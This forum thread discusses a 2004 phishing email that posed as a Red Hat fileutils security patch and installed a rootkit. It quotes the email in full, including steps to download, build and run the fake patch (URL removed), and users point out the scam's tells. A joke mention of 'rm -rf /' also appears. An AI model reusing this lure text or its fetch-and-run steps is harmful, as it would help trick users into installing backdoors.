Freshly from my heise newsletter:

E-Mails have appeared trying to convince people to install an unsigned "security update". However, it's malicious software installing a backdoor. The e-mail seems to look very convincing - I guess since Linux is so strong, the crackers target human beings as the weakest link.

This is the message sent out:


Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.


The RedHat Security Team strongly advises you to immediately
apply the fileutils-1.0.6 patch.
This is a critical-critical update that you must
make by following these steps:
First download the patch from the Security RedHat mirror:
wget [URL removed by Parcival]


Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
cd fileutils-1.0.6.patch
make
./inst


RedHat insists that all their emails and security updates are signed with GPG/PGP!

Don't worry, the idiot(s?) are getting Slashdotted as we speak... http://it.slashdot.org/it/04/10/24/2352234.shtml?tid=172&tid=110&tid=218&tid=106

I'm running 7.2, and haven't seen anything in my mail, yet. Besides, I've never had anything sent to me from Red Hat that had so many grammatical errors as this crap. Say what you will, but RHN is professional in everything they do.

I like the part about it not affecting BSD or Solaris: Why should RHN give a rat's behind about BSD or Solaris? If this exploit affects them, then it's BSD and Solaris' problem, right?

"Critical-critical"? Even RHN knows how to use the adverb "very".

Above all, the RHN releases their patches as rpms with up2date (or apt-get/yum with Fedora). No tarballs involved.

Nothing to see here, people. Move along...

banzai "yum update" kai

It's called Social Engineering, it's the oldest con job. This technique has been used countless times on Windows (ILOVEYOU) and it is no suprise to see it attempted within the Linux comunity.

Red Hat is the most popular distro, so it's no suprise to see it attempted there first.
Any bets we'll get a post here this week with a topic like "I installed the fileutils patch from Red Hat and wierd things have been happening ever since" :p

Originally posted by Icarus
Any bets we'll get a post here this week with a topic like "I installed the fileutils patch from Red Hat and wierd things have been happening ever since" :p

:eek:

Well, I guess right now it's not a big trap since Linux is being used by geeks who know what they're doing. However, once Linux will have taken over Microsoft's 94% market , I bet there will be plenty of former MS sheep getting caught by the wolf. :D

the fake fedora web-site linked in slashdot doesnt work anymore. was it because it was slashdotted?

Originally posted by rocketpcguy
was it because it was slashdotted? Does that really suprise anyone? It's probably hosted on the guys home ComCast server :p

Or some server in China, with a 1 kilobit outbound link... ;)

Besides, who in their right mind would install a binary patch that's distributed as a tarball? Morons... :rolleyes:

Now, if they said "get the fileutils sources, apply this patch, and reinstall", then I might possibly be tempted to believe them. However, the "fileutils sources" part is also totally bogus -- nobody uses fileutils anymore. It's been subsumed in to coreutils as of, oh, about ... April 2003. ;)

However, the "fileutils sources" part is also totally bogus -- nobody uses fileutils anymore. It's been subsumed in to coreutils as of, oh, about ... April 2003.

Bwkaz, do you have posters of source code on your bedroom walls? just wondering. :)

Just in case someone I know falls for this.

Did someone grab the gz and look at it? is it a rootkit thingy? or does it delete stuff?

Does anyone know if any of the anti-virus utilites protect against this yet? ClamAV? McAfee?

mostly curious

Happybunny, it's most likely a rootkit. It instructs them to extract it to / so it overwrites the ls and other commands with the explioted ones.


Originally posted by hard candy
Bwkaz, do you have posters of source code on your bedroom walls? just wondering. :) You kidding? The guy is wired directly to the entire O'Neil library! He sees code, like Neo in the Matrix :D

It's a rootkit (contained in a '.bin' file).

BTW, nobody who ever received a valid RHN advisory--or even saw one over somebody else's shoulder--would have fallen for this.

Red Hat's official line, with respect to updates and patches, has always been "run up2date on each affected server," so this was pretty much a matter of:
"Hello. You already know we aren't legit, but please install this disguised RPM (which contains our customized rootkit) because we can't hack your machine without your assistance."

I doubt the AV folks would even bother with this, since it's pretty-much a situation wherein any admin dumb enough to install the code should be flogged and terminated on the spot.

:D

Not quite posters on the wall. I just remember the small flurry of posts to some of the LFS lists when the project name changed (the LFS book that was current at the time still listed fileutils, sh-utils, and whatever-other-utils). So whenever I see "fileutils" I manually translate that to "coreutils -- and is this message old, or are these people really that clueless?". :p

Originally posted by Icarus
You kidding? The guy is wired directly to the entire O'Neil library! He sees code, like Neo in the Matrix :D

:eek: bwkaz, will you let me borrow your glasses? :)

I do need a new pair. These are about 4 years old, and the scratch-resistant coating is starting to come off...

:p

from: Icarus
You kidding? The guy is wired directly to the entire O'Neil library! He sees code, like Neo in the Matrix


Err. Actually, I can read the "code" on the Matrix posters. Just hold it up to a mirror, and read the Katakana (I really don't need the mirror, either).

Buncha gobbledygook, actually.

banzai "I know Kung-fu!" kai

I posted a talkback about this article on Linux Today with a joke about "rm -rf /" being a vulnerability too by this definition, and some Windows user asked me if "rm -rf /" was an algebraic expression:D

Hence the reason that when more non-technical people switch to Linux this sort of thing will be more of a problem:rolleyes: